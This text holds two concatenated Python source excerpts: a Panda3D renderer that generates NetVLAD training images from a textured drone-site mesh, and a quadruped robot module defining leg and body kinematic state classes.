        print 'Test Renderer Init Done'
        print self.tcolor.OKGREEN, 'Test Renderer Init Done', self.tcolor.ENDC
# Setup NetVLAD Renderer - This renderer is custom made for NetVLAD training
# It renders 16 images at a time. (q, (P1,P2,..P5), (N1,N2,...,N10)).
# ie. 1st image is im, next 5 are near this im (potential positives).
# Last 10 are far from im (definite negatives)
class NetVLADRenderer(ShowBase):
    """Renderer customized for NetVLAD triplet-style training.

    Renders 16 images per frame as (q, (P1..P5), (N1..N10)): camera 0 is
    the query pose, cameras 1-5 are sampled near it (potential positives)
    and cameras 6-15 far from it (definite negatives).
    """
    renderIndx=0  # class-level frame counter shared across instances
    # Basic Mesh & Camera Setup
    def loadAllTextures(self, mesh, basePath, silent=True):
        """ Loads texture files for a mesh """
        c = 0
        for child in mesh.getChildren():
            submesh_name = child.get_name()
            # Texture file shares the submesh name stem: <stem>tex0.jpg
            submesh_texture = basePath + submesh_name[:-5] + 'tex0.jpg'
            child.setTexture( self.loader.loadTexture(submesh_texture) )
            if silent == False:
                print 'Loading texture file : ', submesh_texture
            c = c + 1
        print self.tcolor.OKGREEN, "Loaded ", c, "textures", self.tcolor.ENDC
    def setupMesh(self):
        """ Loads the .obj files. Will load mesh sub-divisions separately """
        print 'Attempt Loading Mesh VErtices, FAces'
        self.cyt = self.loader.loadModel( 'model_l/l6/level_6_0_0.obj' )
        self.cyt2 = self.loader.loadModel( 'model_l/l6/level_6_128_0.obj' )
        self.low_res = self.loader.loadModel( 'model_l/l3/level_3_0_0.obj' )
        print self.tcolor.OKGREEN, 'Done Loading Vertices', self.tcolor.ENDC
        print 'Attempt Loading Textures'
        self.loadAllTextures( self.cyt, 'model_l/l6/')
        self.loadAllTextures( self.cyt2, 'model_l/l6/')
        self.loadAllTextures( self.low_res, 'model_l/l3/')
        print self.tcolor.OKGREEN, 'Done Loading Textures', self.tcolor.ENDC
    def positionMesh(self):
        """ Will have to manually adjust this for your mesh. I position the
            center where I fly my drone and oriented in ENU (East-north-up)
            coords for easy alignment of GPS and my coordinates. If your model
            is not metric scale will have to adjust for that too"""
        self.cyt.setPos( 140,-450, 150 )
        self.cyt2.setPos( 140,-450, 150 )
        self.low_res.setPos( 140,-450, 150 )
        self.cyt.setHpr( 198, -90, 0 )
        self.cyt2.setHpr( 198, -90, 0 )
        self.low_res.setHpr( 198, -90, 0 )
        self.cyt.setScale(172)
        self.cyt2.setScale(172)
        self.low_res.setScale(172)
    def customCamera(self, nameIndx):
        """Create a camera node (FOV 83 deg) attached under self.scene0."""
        lens = self.camLens
        lens.setFov(83)
        print 'self.customCamera : Set FOV at 83'
        my_cam = Camera("cam"+nameIndx, lens)
        my_camera = self.scene0.attachNewNode(my_cam)
        # my_camera = self.render.attachNewNode(my_cam)
        my_camera.setName("camera"+nameIndx)
        return my_camera
    def customDisplayRegion(self, rows, cols):
        """Split self.win2 into a rows x cols grid of display regions."""
        rSize = 1.0 / rows
        cSize = 1.0 / cols
        dr_list = []
        for i in range(0,rows):
            for j in range(0,cols):
                # print i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize
                dr_i = self.win2.makeDisplayRegion(i*rSize, (i+1)*rSize, j*cSize, (j+1)*cSize)
                dr_i.setSort(-5)
                dr_list.append( dr_i )
        return dr_list
    def mc_default( self, cam0X, cam0Y, cam0Z ):
        """Fixed fallback pose: (0, 0, 80) with zero yaw/pitch/roll."""
        return 0,0,80,0,0,0
    def mc_far( self, cam0X, cam0Y, cam0Z ):
        """Sample a pose whose X and Y are each at least ~2*sigma away from
        the reference camera (cam0X, cam0Y, cam0Z) -- a definite negative."""
        rf = np.random.uniform
        nZ = rf(self.mc_Z_min,self.mc_Z_max)
        fov = 1.3962 #80 degrees
        # sigma scales with the ground footprint at height cam0Z
        sigma = cam0Z * np.tan(fov/2.)/3
        # NOTE(review): if cam0 sits near a volume edge, one of these uniform
        # ranges can be inverted (low > high) -- confirm np.random.uniform's
        # behavior there is acceptable.
        nX = rf(self.mc_X_min, cam0X - 2*sigma) if rf(-1,1) > 0 else rf(cam0X + 2*sigma, self.mc_X_max )
        nY = rf(self.mc_Y_min, cam0Y - 2*sigma) if rf(-1,1) > 0 else rf(cam0Y + 2*sigma, self.mc_Y_max )
        yaw = rf(self.mc_yaw_min, self.mc_yaw_max)
        return nX, nY, nZ, yaw, 0 , 0
    # Return a random sample near (cam0X,cam0Y,cam0Z)
    def mc_near( self, cam0X, cam0Y, cam0Z ):
        """Sample a pose within +/- sigma (in X and Y) of the reference
        camera -- a potential positive."""
        rf = np.random.uniform
        nZ = rf(self.mc_Z_min,self.mc_Z_max)
        fov = 1.3962 #80 degrees
        sigma = cam0Z * np.tan(fov/2.)/3
        yaw = rf(self.mc_yaw_min, self.mc_yaw_max)
        return rf(cam0X-sigma,cam0X+sigma), rf(cam0Y-sigma,cam0Y+sigma),nZ,yaw,0.,0.
    ## Gives a random 6-dof pose. Need to set params manually here.
    ## X,Y,Z, Yaw(abt Z-axis), Pitch(abt X-axis), Roll(abt Y-axis)
    ## @param No
    def monte_carlo_sample(self):
        # mc_X_min etc are set in constructor
        X = np.random.uniform(self.mc_X_min,self.mc_X_max)
        Y = np.random.uniform(self.mc_Y_min,self.mc_Y_max)
        Z = np.random.uniform(self.mc_Z_min,self.mc_Z_max)
        yaw = np.random.uniform( self.mc_yaw_min, self.mc_yaw_max)
        roll = 0#np.random.uniform( self.mc_roll_min, self.mc_roll_max)
        pitch = 0#np.random.uniform( self.mc_pitch_min, self.mc_pitch_max)
        return X,Y,Z, yaw,roll,pitch
    ## Annotation-helpers for self.render
    def putBoxes(self,X,Y,Z,r=1.,g=0.,b=0., scale=1.0):
        """Drop one colored marker cube at (X, Y, Z) in the visible scene."""
        cube_x = CubeMaker.CubeMaker().generate()
        cube_x.setColor(r,g,b)
        cube_x.setScale(scale)
        cube_x.reparentTo(self.render)
        cube_x.setPos(X,Y,Z)
    ## Set a cube in 3d env
    def putTrainingBox(self,task):
        """Task: draw a half-transparent box spanning the mc_* sampling
        volume set in the constructor; runs once (returns None)."""
        cube = CubeMaker.CubeMaker().generate()
        cube.setTransparency(TransparencyAttrib.MAlpha)
        cube.setAlphaScale(0.5)
        # cube.setScale(10)
        # mc_X_min etc are set in constructor; half-extents and midpoints:
        sx = 0.5 * (self.mc_X_max - self.mc_X_min)
        sy = 0.5 * (self.mc_Y_max - self.mc_Y_min)
        sz = 0.5 * (self.mc_Z_max - self.mc_Z_min)
        ax = 0.5 * (self.mc_X_max + self.mc_X_min)
        ay = 0.5 * (self.mc_Y_max + self.mc_Y_min)
        az = 0.5 * (self.mc_Z_max + self.mc_Z_min)
        cube.setSx(sx)
        cube.setSy(sy)
        cube.setSz(sz)
        cube.reparentTo(self.render)
        cube.setPos(ax,ay,az)
    ## Task. This task draw the XYZ axis
    def putAxesTask(self,task):
        """Task: on alternating 10-frame windows, trace the X (red),
        Y (green), Z (blue) axes with unit cubes; retires after 25 s."""
        if (task.frame / 10) % 2 == 0:
            cube_x = CubeMaker.CubeMaker().generate()
            cube_x.setColor(1.0,0.0,0.0)
            cube_x.setScale(1)
            cube_x.reparentTo(self.render)
            cube_x.setPos(task.frame,0,0)
            cube_y = CubeMaker.CubeMaker().generate()
            cube_y.setColor(0.0,1.0,0.0)
            cube_y.setScale(1)
            cube_y.reparentTo(self.render)
            cube_y.setPos(0,task.frame,0)
            cube_z = CubeMaker.CubeMaker().generate()
            cube_z.setColor(0.0,0.0,1.0)
            cube_z.setScale(1)
            cube_z.reparentTo(self.render)
            cube_z.setPos(0,0,task.frame)
        if task.time > 25:
            return None
        return task.cont
    ## Render-n-Learn task
    ##
    ## set pose in each camera <br/>
    ## make note of the poses just set as this will take effect next <br/>
    ## Retrive Rendered Data <br/>
    ## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images <br/>
    ## Put imX into the queue <br/>
    def renderNlearnTask(self, task):
        """Panda3d task: pose the 16 cameras as (query, 5 near, 10 far),
        then harvest the previous frame's 4x4 grid into the queues.

        Poses take effect one frame late; self.prevPoses matches the
        texture retrieved this call.
        """
        if task.time < 2: #do not do anything for 1st 2 sec
            return task.cont
        # print randX, randY, randZ
        #
        ## set pose in each camera
        # Note: The texture is grided images in a col-major format
        poses = np.zeros( (len(self.cameraList), 4), dtype='float32' )
        # Camera 0's pose is the reference for the near/far samplers below.
        _randX= _randY= _randZ= _randYaw= _randPitch= _randRoll = 0
        for i in range(len(self.cameraList)):
            if i==0:
                _randX,_randY, _randZ, _randYaw, _randPitch, _randRoll = self.monte_carlo_sample()
                (randX,randY, randZ, randYaw, randPitch, randRoll) = _randX, _randY, _randZ, _randYaw, _randPitch, _randRoll
            elif i>=1 and i<6:
                randX,randY, randZ, randYaw, randPitch, randRoll = self.mc_near(_randX, _randY, _randZ )
            else:
                randX,randY, randZ, randYaw, randPitch, randRoll = self.mc_far(_randX, _randY, _randZ)
            self.cameraList[i].setPos(randX,randY,randZ)
            # -90 pitch offset points the camera straight down at the mesh
            self.cameraList[i].setHpr(randYaw,-90+randPitch,0+randRoll)
            poses[i,0] = randX
            poses[i,1] = randY
            poses[i,2] = randZ
            poses[i,3] = randYaw
            # self.putBoxes(randX,randY,randZ, scale=0.3)
        #
        # if task.frame < 100:
        #     return task.cont
        # else:
        #     return None
        ## make note of the poses just set as this will take effect next
        if NetVLADRenderer.renderIndx == 0:
            NetVLADRenderer.renderIndx = NetVLADRenderer.renderIndx + 1
            self.prevPoses = poses
            return task.cont
        #
        ## Retrive Rendered Data
        tex = self.win2.getScreenshot()
        A = np.array(tex.getRamImageAs("RGB")).reshape(960,1280,3)
        # A = np.zeros((960,1280,3))
        # A_bgr = cv2.cvtColor(A.astype('uint8'),cv2.COLOR_RGB2BGR)
        # cv2.imwrite( str(TrainRenderer.renderIndx)+'.png', A_bgr.astype('uint8') )
        # myTexture = self.win2.getTexture()
        # print myTexture
        # retrive poses from prev render
        texPoses = self.prevPoses
        #
        ## Cut rendered data into individual image. Note rendered data will be 4X4 grid of images
        #960 rows and 1280 cols (4x4 image-grid)
        nRows = 240
        nCols = 320
        # Iterate over the rendered texture in a col-major format
        c=0
        if self.q_imStack.qsize() < 150:
            for j in range(4): #j is for cols-indx
                for i in range(4): #i is for rows-indx
                    #print i*nRows, j*nCols, (i+1)*nRows, (j+1)*nCols
                    im = A[i*nRows:(i+1)*nRows,j*nCols:(j+1)*nCols,:]
                    #imX = im.astype('float32')/255. - .5 # TODO: have a mean image
                    #imX = (im.astype('float32') - 128.0) /128.
                    imX = im.astype('float32') #- self.meanImage
                    # print 'Noise Added to renderedIm'
                    # imX = imX + 10.*np.random.randn( imX.shape[0], imX.shape[1], imX.shape[2] )
                    ## Put imX into the queue
                    # do not queue up if queue size begin to exceed 150
                    self.q_imStack.put( imX )
                    self.q_labelStack.put( texPoses[c,:] )
                    # fname = '__'+str(poses[c,0]) + '_' + str(poses[c,1]) + '_' + str(poses[c,2]) + '_' + str(poses[c,3]) + '_'
                    # cv2.imwrite( str(TrainRenderer.renderIndx)+'__'+str(i)+str(j)+fname+'.png', imX.astype('uint8') )
                    c = c + 1
        else:
            print 'q_imStack.qsize() > 150. Queue is filled, not retriving the rendered data'
        #
        # Call caffe iteration (reads from q_imStack and q_labelStack)
        # Possibly upgrade to TensorFlow
        # self.learning_iteration()
        # if( TrainRenderer.renderIndx > 50 ):
        #     return None
        #
        # Prep for Next Iteration
        NetVLADRenderer.renderIndx = NetVLADRenderer.renderIndx + 1
        self.prevPoses = poses
        return task.cont
    ## Execute 1-step.
    ##
    ## This function is to be called from outside to render once. This is a wrapper for app.taskMgr.step()
    def step(self, batchsize):
        """ One rendering.
        This function needs to be called from outside in a loop for continous rendering
        Returns 2 variables. One im_batch and another label
        """
        # ltimes = int( batchsize/16 ) + 1
        # print 'Render ', ltimes, 'times'
        # for x in range(ltimes):
        # Note: 2 renders sometime fails. Donno exactly what happens :'(
        # Instead I do app.taskMgr.step() in the main() instead, once and 1 time here. This seem to work OK
        # self.taskMgr.step()
        # Thread.sleep(0.1)
        self.taskMgr.step()
        # print 'Queues Status (imStack=%d,labelStack=%d)' %(self.q_imStack.qsize(), self.q_labelStack.qsize())
        # TODO: Check validity of batchsize. Also avoid hard coding the thresh for not retriving from queue.
        im_batch = np.zeros((batchsize,240,320,3))
        label_batch = np.zeros((batchsize,4))
        # assert self.q_imStack.qsize() > 16*5
        if self.q_imStack.qsize() >= 16*5:
            # get a batch out
            for i in range(batchsize):
                im = self.q_imStack.get() #240x320x3 RGB
                y = self.q_labelStack.get()
                # print 'retrive', i
                #remember to z-normalize
                im_batch[i,:,:,0] = copy.deepcopy(im[:,:,0])#self.zNormalized( copy.deepcopy(im[:,:,0]) )
                im_batch[i,:,:,1] = copy.deepcopy(im[:,:,1])#self.zNormalized( copy.deepcopy(im[:,:,1]) )
                im_batch[i,:,:,2] = copy.deepcopy(im[:,:,2])#self.zNormalized( copy.deepcopy(im[:,:,2]) )
                label_batch[i,0] = copy.deepcopy( y[0] )
                label_batch[i,1] = copy.deepcopy( y[1] )
                label_batch[i,2] = copy.deepcopy( y[2] )
                label_batch[i,3] = copy.deepcopy( y[3] )
        else:
            return None, None
        # NOTE(review): execution falls through here even when the branch
        # above filled im_batch/label_batch from the queues, so that freshly
        # dequeued batch is unconditionally overwritten by the pickle load
        # below -- rendered frames are consumed but never returned. The
        # trailing note suggests the pickle path was meant only as a
        # fallback; confirm this fall-through is intended.
        f_im = 'im_batch.pickle'
        f_lab = 'label_batch.pickle'
        print 'Loading : ', f_im, f_lab
        with open( f_im, 'rb' ) as handle:
            im_batch = pickle.load(handle )
        with open( f_lab, 'rb' ) as handle:
            label_batch = pickle.load(handle )
        print 'Done.@!'
        # im_batch = copy.deepcopy( self.X_im_batch )
        # # label_batch = copy.deepcopy( self.X_label_batch )
        #
        # Draw `batchsize` random samples (with replacement) from the load.
        r0 = np.random.randint( 0, im_batch.shape[0], batchsize )
        # r1 = np.random.randint( 0, im_batch.shape[0], batchsize )
        im_batch = im_batch[r0]
        label_batch = label_batch[r0]
        # Note:
        #   What is being done here is a bit of a hack. The thing is
        #   in the mainloop() ie. in train_tf_decop.py doesn't allow any
        #   if statements. So, I have instead saved a few example-renders on a
        #   pickle-file. If the queue is not sufficiently filled i just return
        #   from the saved file.
        return im_batch, label_batch
    def __init__(self):
        """Build the NetVLAD scene: load/position the mesh, create an
        offscreen 1280x960 window split into a 4x4 grid of 16 cameras, and
        create the image/label queues filled by renderNlearnTask()."""
        ShowBase.__init__(self)
        self.taskMgr.add( self.renderNlearnTask, "renderNlearnTask" ) #changing camera poses
        self.taskMgr.add( self.putAxesTask, "putAxesTask" ) #draw co-ordinate axis
        self.taskMgr.add( self.putTrainingBox, "putTrainingBox" )
        # Set up training area. This is used in monte_carlo_sample() and putTrainingBox()
        self.mc_X_max = 300
        self.mc_X_min = -300
        self.mc_Y_max = 360
        self.mc_Y_min = -360
        self.mc_Z_max = 120
        self.mc_Z_min = 45
        self.mc_yaw_max = 85
        self.mc_yaw_min = -85
        self.mc_roll_max = 5
        self.mc_roll_min = -5
        self.mc_pitch_max = 5
        self.mc_pitch_min = -5
        # # Note params
        # self.PARAM_TENSORBOARD_PREFIX = TENSORBOARD_PREFIX
        # self.PARAM_MODEL_SAVE_PREFIX = MODEL_SAVE_PREFIX
        # self.PARAM_MODEL_RESTORE = MODEL_RESTORE
        #
        # self.PARAM_WRITE_SUMMARY_EVERY = WRITE_SUMMARY_EVERY
        # self.PARAM_WRITE_TF_MODEL_EVERY = WRITE_TF_MODEL_EVERY
        # Misc Setup
        self.render.setAntialias(AntialiasAttrib.MAuto)
        self.setFrameRateMeter(True)
        self.tcolor = TerminalColors.bcolors()
        #
        # Set up Mesh (including load, position, orient, scale)
        self.setupMesh()
        self.positionMesh()
        # Custom Render
        # Important Note: self.render displays the low_res and self.scene0 is the images to retrive
        self.scene0 = NodePath("scene0")
        # cytX = copy.deepcopy( cyt )
        self.low_res.reparentTo(self.render)
        self.cyt.reparentTo(self.scene0)
        self.cyt2.reparentTo(self.scene0)
        #
        # Make Buffering Window
        bufferProp = FrameBufferProperties().getDefault()
        props = WindowProperties()
        props.setSize(1280, 960)
        win2 = self.graphicsEngine.makeOutput( pipe=self.pipe, name='wine1',
                sort=-1, fb_prop=bufferProp , win_prop=props,
                flags=GraphicsPipe.BFRequireWindow)
                #flags=GraphicsPipe.BFRefuseWindow)
        # self.window = win2#self.win #dr.getWindow()
        self.win2 = win2
        # self.win2.setupCopyTexture()
        # Adopted from : https://www.panda3d.org/forums/viewtopic.php?t=3880
        #
        # Set Multiple Cameras
        self.cameraList = []
        for i in range(4*4):
            print 'Create camera#', i
            self.cameraList.append( self.customCamera( str(i) ) )
        # Disable default camera
        # dr = self.camNode.getDisplayRegion(0)
        # dr.setActive(0)
        #
        # Set Display Regions (4x4)
        dr_list = self.customDisplayRegion(4,4)
        #
        # Setup each camera
        for i in range(len(dr_list)):
            dr_list[i].setCamera( self.cameraList[i] )
        #
        # Set buffered Queues (to hold rendered images and their positions)
        # each queue element will be an RGB image of size 240x320x3
        self.q_imStack = Queue.Queue()
        self.q_labelStack = Queue.Queue()
        print self.tcolor.OKGREEN, '\n##########\n'+'Panda3d Renderer Initialization Complete'+'\n##########\n', self.tcolor.ENDC
| 33.884699 | 129 | 0.587048 |
01530d6788eec8bc5f7a3f5abd8ef0794178a80e | 14,415 | py | Python | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | src/squad/motion/states.py | douglasdaly/spot-robot | 7a4fdd7eb5fe5fc2d31180ed6b9f7ea21647bea2 | [
"MIT"
] | null | null | null | from collections.abc import Sequence
from datetime import datetime
from typing import (
Any,
Dict,
Iterable,
Iterator,
List,
Optional,
Tuple,
TypeVar,
Union,
)
from squad.constants import Leg
from squad.exceptions import StateError
from squad.kinematics.base import BodyParameters
from squad.kinematics.forward import foot_xyz
from squad.kinematics.inverse import leg_thetas
from .base import BaseState
L = TypeVar("L", bound="LegStates")
T_LegState = TypeVar("T_LegState", bound="LegState")
class LegState(BaseState):
    """
    Leg state data for one leg of the robot.

    Keeps the cartesian foot position (x, y, z) and the three joint angles
    (hip, femur, leg) for a single leg in sync: updating one representation
    recomputes the other through the kinematics helpers.
    """

    __slots__ = (
        "_leg",
        "_x",
        "_y",
        "_z",
        "_hip_theta",
        "_femur_theta",
        "_leg_theta",
    )

    def __init__(
        self,
        leg: Leg,
        x: float,
        y: float,
        z: float,
        hip_theta: float,
        femur_theta: float,
        leg_theta: float,
        **kwargs: Any,
    ) -> None:
        super().__init__(**kwargs)
        self._leg = leg
        self._x = x
        self._y = y
        self._z = z
        self._hip_theta = hip_theta
        self._femur_theta = femur_theta
        self._leg_theta = leg_theta

    @property
    def leg(self) -> Leg:
        """Leg: The leg with this state object."""
        return self._leg

    @property
    def x(self) -> float:
        """float: The current X-coordinate of the foot."""
        return self._x

    @property
    def y(self) -> float:
        """float: The current Y-coordinate of the foot."""
        return self._y

    @property
    def z(self) -> float:
        """float: The current Z-coordinate of the foot."""
        return self._z

    @property
    def hip_theta(self) -> float:
        """float: The current hip angle for this leg."""
        return self._hip_theta

    @property
    def femur_theta(self) -> float:
        """float: The current femur angle for this leg."""
        return self._femur_theta

    @property
    def leg_theta(self) -> float:
        """float: The current leg angle for this leg."""
        return self._leg_theta

    def __str_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:
        s_args, s_kws = super().__str_args__()
        s_kws["x"] = self._x
        s_kws["y"] = self._y
        s_kws["z"] = self._z
        s_kws["hip_theta"] = self._hip_theta
        s_kws["femur_theta"] = self._femur_theta
        s_kws["leg_theta"] = self._leg_theta
        return s_args, s_kws

    def __repr_args__(self) -> Tuple[Iterable[Any], Dict[str, Any]]:
        r_args, r_kws = super().__repr_args__()
        r_kws["x"] = self._x
        r_kws["y"] = self._y
        r_kws["z"] = self._z
        r_kws["hip_theta"] = self._hip_theta
        r_kws["femur_theta"] = self._femur_theta
        r_kws["leg_theta"] = self._leg_theta
        return r_args, r_kws

    def __hash_params__(self) -> Tuple[Any, ...]:
        # The leg identity participates in the hash so states for different
        # legs never collide.
        return super().__hash_params__() + (self.leg,)

    def update_position(
        self,
        x: float,
        y: float,
        z: float,
        **kwargs: Any,
    ) -> None:
        """Updates the leg's state for the given foot position.

        Parameters
        ----------
        x : float
            The new X-coordinate of the foot to set.
        y : float
            The new Y-coordinate of the foot to set.
        z : float
            The new Z-coordinate of the foot to set.
        **kwargs : optional
            Any additional parameters to pass to the :obj:`leg_thetas`
            function.
        """
        self._x = x
        self._y = y
        self._z = z
        # Keep the joint angles consistent with the new position (inverse
        # kinematics).
        self._hip_theta, self._femur_theta, self._leg_theta = leg_thetas(
            self._leg,
            x,
            y,
            z,
            **kwargs,
        )
        self._timestamp = datetime.now()

    def update_orientation(
        self,
        hip_theta: float,
        femur_theta: float,
        leg_theta: float,
        **kwargs: Any,
    ) -> None:
        """Updates the leg's state for the given servo angles.

        Parameters
        ----------
        hip_theta : float
            The new Hip-angle of the leg to set.
        femur_theta : float
            The new Femur-angle of the leg to set.
        leg_theta : float
            The new Leg-angle of the leg to set.
        **kwargs : optional
            Any additional parameters to pass to the :obj:`foot_xyz`
            function.
        """
        self._hip_theta = hip_theta
        self._femur_theta = femur_theta
        self._leg_theta = leg_theta
        # Keep the foot position consistent with the new angles (forward
        # kinematics).
        self._x, self._y, self._z = foot_xyz(
            self._leg,
            hip_theta,
            femur_theta,
            leg_theta,
            **kwargs,
        )
        # BUGFIX: refresh the timestamp here as well, for consistency with
        # update_position() -- previously only position updates touched it,
        # so orientation-only updates left a stale timestamp.
        self._timestamp = datetime.now()

    def distance(self, other: "LegState") -> float:
        # Euclidean distance between the two foot positions.
        super().distance(other)
        return (
            ((self._x - other._x) ** 2)
            + ((self._y - other._y) ** 2)
            + ((self._z - other._z) ** 2)
        ) ** 0.5

    @classmethod
    def from_position(
        cls,
        leg: Leg,
        x: float,
        y: float,
        z: float,
        *,
        timestamp: Optional[datetime] = None,
        **kwargs: Any,
    ) -> "LegState":
        """Creates a new LegState from the given foot position.

        Parameters
        ----------
        leg : Leg
            The leg to create the new state object for.
        x : float
            The X-coordinate of the foot to create the new state for.
        y : float
            The Y-coordinate of the foot to create the new state for.
        z : float
            The Z-coordinate of the foot to create the new state for.
        timestamp : datetime, optional
            The timestamp to use for the new state, if any.
        **kwargs : optional
            Additional keyword arguments to pass to the
            :obj:`leg_thetas` function.

        Returns
        -------
        LegState
            The leg state requested, initialized from the given foot
            position.
        """
        t_hip, t_femur, t_leg = leg_thetas(leg, x, y, z, **kwargs)
        return cls(leg, x, y, z, t_hip, t_femur, t_leg, timestamp=timestamp)

    @classmethod
    def from_thetas(
        cls,
        leg: Leg,
        hip_theta: float,
        femur_theta: float,
        leg_theta: float,
        *,
        timestamp: Optional[datetime] = None,
        **kwargs: Any,
    ) -> "LegState":
        """Creates a new LegState from the given servo angles.

        Parameters
        ----------
        leg : Leg
            The leg to create the new state object for.
        hip_theta : float
            The Hip-angle of the leg to create the new state for.
        femur_theta : float
            The Femur-angle of the leg to create the new state for.
        leg_theta : float
            The Leg-angle of the leg to create the new state for.
        timestamp : datetime, optional
            The timestamp to use for the new state, if any.
        **kwargs : optional
            Additional keyword arguments to pass to the :obj:`foot_xyz`
            function.

        Returns
        -------
        LegState
            The leg state requested, initialized from the given leg
            servo angles.
        """
        x, y, z = foot_xyz(leg, hip_theta, femur_theta, leg_theta, **kwargs)
        return cls(
            leg,
            x,
            y,
            z,
            hip_theta,
            femur_theta,
            leg_theta,
            timestamp=timestamp,
        )
class LegStates(Sequence[T_LegState], BaseState):
    """
    Composite state/wrapper for holding :obj:`LegState` objects.

    Holds exactly one state per leg, sorted by :obj:`Leg` value, exposed
    both by index and via the ``fl``/``fr``/``bl``/``br`` shortcuts.
    """

    __slots__ = ("_legs",)

    def __init__(self, *leg_states: T_LegState, **kwargs: Any) -> None:
        self._legs: List[T_LegState] = sorted(leg_states, key=lambda x: x.leg)
        if len(self._legs) != 4:
            raise StateError(
                "Invalid number of leg states given (requires 4), got:"
                f" {len(self._legs)}"
            )
        elif not all(x.leg == (i + 1) for i, x in enumerate(self._legs)):
            raise StateError("Not all legs represented in leg states given")
        # Default the composite timestamp to the newest per-leg timestamp.
        if "timestamp" not in kwargs or kwargs["timestamp"] is None:
            kwargs["timestamp"] = max(x.timestamp for x in self._legs)
        super().__init__(**kwargs)

    @property
    def fl(self) -> T_LegState:
        """LegState: State of the front-left leg."""
        return self._legs[Leg.FL - 1]

    @property
    def fr(self) -> T_LegState:
        """LegState: State of the front-right leg."""
        return self._legs[Leg.FR - 1]

    @property
    def bl(self) -> T_LegState:
        """LegState: State of the back-left leg."""
        return self._legs[Leg.BL - 1]

    @property
    def br(self) -> T_LegState:
        """LegState: State of the back-right leg."""
        return self._legs[Leg.BR - 1]

    def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
        s_args, s_kws = super().__str_args__()
        # BUGFIX: this previously built a generator expression that was never
        # iterated, so the appends never ran and the leg states were silently
        # omitted from the string form.
        s_args.extend(self._legs)
        return s_args, s_kws

    def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
        r_args, r_kws = super().__repr_args__()
        # BUGFIX: same unconsumed-generator bug as __str_args__.
        r_args.extend(self._legs)
        return r_args, r_kws

    def __iter__(self) -> Iterator[T_LegState]:
        return iter(self._legs)

    def __len__(self) -> int:
        return len(self._legs)

    def __getitem__(self, leg: Union[int, Leg]) -> T_LegState:
        # Accepts either a Leg enum member (1-based) or a plain 0-based index.
        if isinstance(leg, Leg):
            l_idx = leg.value - 1
        else:
            l_idx = leg
        return self._legs[l_idx]

    def __getstate__(self) -> Dict[str, Any]:
        state = super().__getstate__()
        state["legs"] = [x.__getstate__() for x in self._legs]
        return state

    def __setstate__(self, state: Dict[str, Any]) -> None:
        # Rebuild LegState objects from their serialized dicts before handing
        # the rest of the state to the base class.
        legs: List[Dict[str, Any]] = state.pop("legs")
        state["legs"] = [LegState.from_dict(x) for x in legs]
        return super().__setstate__(state)

    def distance(self, other: "LegStates") -> float:
        # Mean of the per-leg foot distances.
        super().distance(other)
        ret = 0.0
        for i, v in enumerate(self._legs):
            ret += v.distance(other._legs[i])
        return ret / len(self._legs)
class RobotState(BaseState):
    """
    Overall kinematic state data storage for the robot.

    Combines the body pose (x, y, z, roll, pitch, yaw), the per-leg states
    and the static body parameters into one snapshot.
    """
    __slots__ = (
        "_x",
        "_y",
        "_z",
        "_roll",
        "_pitch",
        "_yaw",
        "_leg_states",
        "_body",
    )
    def __init__(
        self,
        x: float,
        y: float,
        z: float,
        roll: float,
        pitch: float,
        yaw: float,
        legs: Sequence[LegState],
        *,
        body_params: Optional[BodyParameters] = None,
        **kwargs: Any,
    ) -> None:
        """Build a robot state snapshot.

        :param x: body X-coordinate.
        :param y: body Y-coordinate.
        :param z: body Z-coordinate.
        :param roll: body roll angle.
        :param pitch: body pitch angle.
        :param yaw: body yaw angle.
        :param legs: one :obj:`LegState` per leg (validated by ``LegStates``).
        :param body_params: pre-built body parameters; built from ``kwargs``
            when omitted.
        """
        # NOTE(review): when body_params is omitted, **kwargs is forwarded to
        # both BodyParameters and the BaseState constructor -- confirm the two
        # accept disjoint (or safely ignorable) keyword sets.
        if body_params is None:
            self._body = BodyParameters(**kwargs)
        else:
            self._body = body_params
        super().__init__(**kwargs)
        self._x = x
        self._y = y
        self._z = z
        self._roll = roll
        self._pitch = pitch
        self._yaw = yaw
        self._leg_states = LegStates(*legs)
    @property
    def x(self) -> float:
        """float: The current X-coordinate of the body."""
        return self._x
    @property
    def y(self) -> float:
        """float: The current Y-coordinate of the body."""
        return self._y
    @property
    def z(self) -> float:
        """float: The current Z-coordinate of the body."""
        return self._z
    @property
    def roll(self) -> float:
        """float: The current Roll-angle of the body."""
        return self._roll
    @property
    def pitch(self) -> float:
        """float: The current Pitch-angle of the body."""
        return self._pitch
    @property
    def yaw(self) -> float:
        """float: The current Yaw-angle of the body."""
        return self._yaw
    @property
    def legs(self) -> LegStates[LegState]:
        """LegStates[LegState]: The state of each leg."""
        return self._leg_states
    @property
    def body(self) -> BodyParameters:
        """BodyParameters: The related body parameters for this state."""
        return self._body
    def __str_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
        # Pose components are shown as keywords; leg states are omitted from
        # the (shorter) str form.
        s_args, s_kws = super().__str_args__()
        s_kws["x"] = self._x
        s_kws["y"] = self._y
        s_kws["z"] = self._z
        s_kws["roll"] = self._roll
        s_kws["pitch"] = self._pitch
        s_kws["yaw"] = self._yaw
        return s_args, s_kws
    def __repr_args__(self) -> Tuple[List[Any], Dict[str, Any]]:
        # Positional args mirror the __init__ signature order, with the leg
        # states appended as a tuple.
        r_args, r_kws = super().__repr_args__()
        r_args.append(self._x)
        r_args.append(self._y)
        r_args.append(self._z)
        r_args.append(self._roll)
        r_args.append(self._pitch)
        r_args.append(self._yaw)
        r_args.append(tuple(self._leg_states))
        return r_args, r_kws
    def __getstate__(self) -> Dict[str, Any]:
        state = super().__getstate__()
        state["legs"] = self._leg_states.__getstate__()
        state["body"] = self._body.__getstate__()
        return state
    def __setstate__(self, state: Dict[str, Any]) -> None:
        # Rehydrate the nested objects before delegating to the base class.
        state["legs"] = LegStates.from_dict(state.pop("legs"))
        state["body"] = BodyParameters.from_dict(state.pop("body"))
        return super().__setstate__(state)
    def distance(self, other: "RobotState") -> float:
        # Combined Euclidean distance over position AND orientation
